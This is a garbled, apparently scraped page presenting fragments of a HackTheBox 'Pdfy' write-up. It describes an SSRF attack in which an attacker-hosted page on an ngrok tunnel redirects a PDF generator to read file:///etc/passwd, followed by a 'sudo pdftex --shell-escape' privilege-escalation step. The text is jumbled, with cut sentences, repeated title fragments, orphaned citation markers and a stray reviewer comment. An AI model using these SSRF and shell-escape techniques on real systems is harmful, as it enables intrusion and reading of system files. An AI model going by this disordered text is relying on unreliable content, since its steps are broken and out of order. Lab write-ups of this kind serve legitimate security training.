Pdfy Htb Writeup Upd !!exclusive!! File

tool is known to be vulnerable to SSRF if it renders user-controlled HTML or follows redirects to local files [1, 26]. : Read the /etc/passwd file to find the flag [13, 14]. The Technique : Since direct file paths (like file:///etc/passwd ) may be blocked by a basic filter, you can use a PHP redirect script hosted on your own server (or a service like ) [1, 11]. redirect.php

"url": "http://0.tcp.us-cal-1.ngrok.io:19086/index.html"

Interacting with the application web page reveals a single input form requiring a URL. Submitting a legitimate external site (like http://google.com ) successfully triggers the application to query the destination and serve a valid HTML layout inside a rendered PDF file. 2. Testing for Direct Local Restrictions pdfy htb writeup upd

Create a file named index.html in the root of your local web server's directory.

The writeup could use more screenshots of the web interface, especially the PDF upload/generation page. A few diagrams of the privilege escalation flow would also help visual learners. tool is known to be vulnerable to SSRF

sudo -l

The server processes the request. It fetches our index.html , which contains the <iframe> pointing to our axura.php script. The server then fetches our script and receives a redirect to file:///etc/passwd . Finally, it retrieves the contents of the local password file and renders them into a PDF. redirect

sudo /usr/bin/pdftex --shell-escape